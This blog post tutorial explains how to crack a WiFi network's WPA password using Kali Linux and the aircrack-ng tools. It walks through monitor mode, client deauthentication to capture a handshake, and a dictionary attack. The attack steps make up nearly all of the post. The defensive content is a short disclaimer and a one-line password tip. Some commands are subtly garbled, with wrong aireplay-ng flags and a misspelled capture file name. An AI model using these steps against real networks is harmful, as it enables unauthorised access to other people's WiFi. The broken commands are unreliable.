Security Is just an Illusion. We are Nepali Web penetrator tester from Usa.

Advertisement

Wednesday, June 22, 2016

How a cracker can crack your wifi network and how to be safe from that.

How a cracker can crack your wifi network and how to be safe from that.


Hello ! guys.
Welcome to my blog guys. In this tutorial , I am going to tell you  how to crack your WiFI password and how to be safe from them.
1) First of all, We need Kali linux operating system to crack the WiFi password.
2) After that look out to the available WiFi adapter by opening a terminal and typing airmon-ng .
3) And then turn on monitor mode by typing airmon-ng start wlan0 .
4) After that search and look the available WiFi AP by typing airodump-ng  wlan0mon .
5) Press ctrl+c to stop scanning.
6) Now type airodump-ng –w hacker --bssid {enter bssid id of AP} –c {Enter channel of the Ap} wlan0mon.
7) After that we have to capture handshake. For that we have to deauthenticate user from the WiFi AP by typing aireplay-ng –a 0 0 –a {Enter bssid of Ap} wlan0mon
8)After capturing handshake lets go to the cracking process by typing aircrack-ng hacker-01.cao –w {wordlist destinational}.
9) It might take long time, it depends upon the wifi password length.
Don’t try this steps in others WiFi Network. This is only for an educational purpose that how a cracker can crack your password.
TO be safe from such dictionary attack just make your WiFI password containing numbers , small/capital letters , characters like !@#$%^&*.
Here is a short video about this topic hope you will enjoy this!!!
Please subscribe us on youtube :p


No comments:

Post a Comment